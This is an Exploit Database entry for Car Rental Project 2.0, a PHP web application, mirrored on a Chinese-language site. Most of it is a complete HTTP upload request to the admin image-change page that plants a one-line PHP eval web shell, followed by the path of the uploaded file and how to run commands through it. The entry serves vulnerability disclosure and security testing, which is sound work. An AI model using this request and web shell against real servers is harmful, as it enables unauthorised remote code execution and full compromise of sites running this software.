Car Rental Project 2.0 – Arbitrary File Upload to Remote Code Execution

• Exploit Database
• 19 阅读

• 作者： Jannick Tiger
  日期： 2021-02-03
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/49520/

• # Exploit Title: Car Rental Project 2.0 - Arbitrary File Upload to Remote Code Execution
  # Date: 3/2/2021
  # Exploit Author: Jannick Tiger
  # Vendor Homepage: https://phpgurukul.com/
  # Software Link: https://phpgurukul.com/car-rental-project-php-mysql-free-download/
  # Version:V 2.0
  # Tested on Windows 10, XAMPP
  
  POST /carrental/admin/changeimage1.php?imgid=4 HTTP/1.1
  Host: localhost
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0)
  Gecko/20100101 Firefox/85.0
  Accept:
  text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
  Accept-Encoding: gzip, deflate
  Content-Type: multipart/form-data;
  boundary=---------------------------346751171915680139113101061568
  Content-Length: 369
  Origin: http://localhost
  Connection: close
  Referer: http://localhost/carrental/admin/changeimage1.php?imgid=4
  Cookie: PHPSESSID=te82lj6tvep7afns0qm890393e
  Upgrade-Insecure-Requests: 1
  
  -----------------------------346751171915680139113101061568
  Content-Disposition: form-data; name="img1"; filename="1.php"
  Content-Type: application/octet-stream
  
  <?php @eval($_POST[pp]);?>
  -----------------------------346751171915680139113101061568
  Content-Disposition: form-data; name="update"
  
  
  -----------------------------346751171915680139113101061568--
  
  
  # Uploaded Malicious File canbe Found in :
  carrental\admin\img\vehicleimages\1.php
  # go to http://localhost/carrental/admin/img/vehicleimages/1.php, Execute malicious code via post value phpinfo();